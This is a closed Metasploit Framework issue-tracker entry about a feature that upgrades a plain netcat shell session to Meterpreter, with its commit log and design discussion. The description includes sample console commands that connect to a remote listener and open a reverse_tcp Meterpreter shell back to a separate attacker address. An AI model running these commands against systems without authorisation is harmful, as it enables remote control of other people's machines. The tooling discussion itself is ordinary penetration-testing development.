Feature #394

Upgrade Payload

Added by Rob Fuller over 2 years ago. Updated 4 months ago.

Status:Closed Start date:10/19/2009
Priority:Normal Due date:
Assignee:Joshua J. Drake % Done:

100%
Category:general
Target version:Metasploit 3.4.1
Resolution:fixed How To Use:
Release Note:

Description

Say for instance all you have is netcat listening on a remote host, using connect you add a simple shell to your sessions.

A sessions command to upgrade (or 'migrate') the current session given an architecture/os. ie.

msf> connect 192.168.92.113 2030
[*] Connected to 192.168.92.113:2030
Background session 1? [y/N] y
msf> sessions -u windows/meterpreter/reverse_tcp -o LHOST=192.168.92.103,LPORT=443
Upgrading to meterpreter.... done!
[*] Meterpreter session 3 opened (192.168.92.103:443 -> 192.168.92.113:1162)

It could be called "spawn new session", and not close the old connection instead. Just some ideas..

Related issues

related to Metasploit Framework - Feature #2097: Sessions command should be more user-friendly New 06/15/2010
related to Metasploit Framework - Bug #2124: session upgrade script fails to function using x64 payloads Assigned 06/20/2010

Associated revisions

Revision a811ad0c
Added by Joshua Drake almost 2 years ago

clean up, add comments, and fix bug in command dispatcher, fixes #394

git-svn-id: file:///home/svn/framework3/trunk@8808 4d416f70-5f16-0410-b530-b9f4589650da

Revision ec325f9a
Added by Joshua Drake almost 2 years ago

adjust help text, see #394

git-svn-id: file:///home/svn/framework3/trunk@8809 4d416f70-5f16-0410-b530-b9f4589650da

Revision 210e2417
Added by Joshua Drake almost 2 years ago

use exploit datastore instead of global datastore -- see #394

git-svn-id: file:///home/svn/framework3/trunk@8881 4d416f70-5f16-0410-b530-b9f4589650da

History

#1
Updated by Joshua J. Drake almost 2 years ago

  • Status changed from New to Resolved
  • % Done changed from 0 to 100

Applied in changeset r8808.

#2
Updated by Joshua J. Drake almost 2 years ago

  • Status changed from Resolved to Feedback

The first commit for this was r8807. I mistakenly forgot to reference it.

The only thing missing is the ability to specify additional options (payload, opts on command line).. You can set them in the local scope just fine though (except payload).

Unfortunately the sessions command can't really be overloaded to achieve the usage above. In order to get more options on the command line, we would have to create a new command or redesign the sessions command altogether.

I'm actually leaning towards the latter since I feel the command should allow you to select 1 or more sessions and do some operation on all of them...

eg:

msf> sessions 1,2,3,4 run checkvm
...
msf> sessions 1 interact
..
msf> sessions all kill
...

#3
Updated by Joshua J. Drake almost 2 years ago

  • Assignee changed from HD Moore to Joshua J. Drake

#4
Updated by Joshua J. Drake almost 2 years ago

  • Resolution set to fixed

#5
Updated by Joshua J. Drake almost 2 years ago

David Kennedy encountered a problem where LHOST and LPORT were not being honored from exploit context. Using "setg" works as a workaround until it is possible to pass additional parameters (payload/vars) into this script...

Allowing the payload and vars to be passed directly to the script via the syntax in the original feature request should alleviate this issue..

#6
Updated by Joshua J. Drake almost 2 years ago

  • Target version changed from Metasploit 3.4.0 to Metasploit 3.5.0

#7
Updated by Joshua J. Drake over 1 year ago

  • Status changed from Feedback to Resolved

#8
Updated by Jonathan Cran over 1 year ago

  • Status changed from Resolved to Closed

resolved -> closed

#9
Updated by Joshua J. Drake over 1 year ago

  • Target version changed from Metasploit 3.5.0 to Metasploit 3.4.1

Also available in: Atom PDF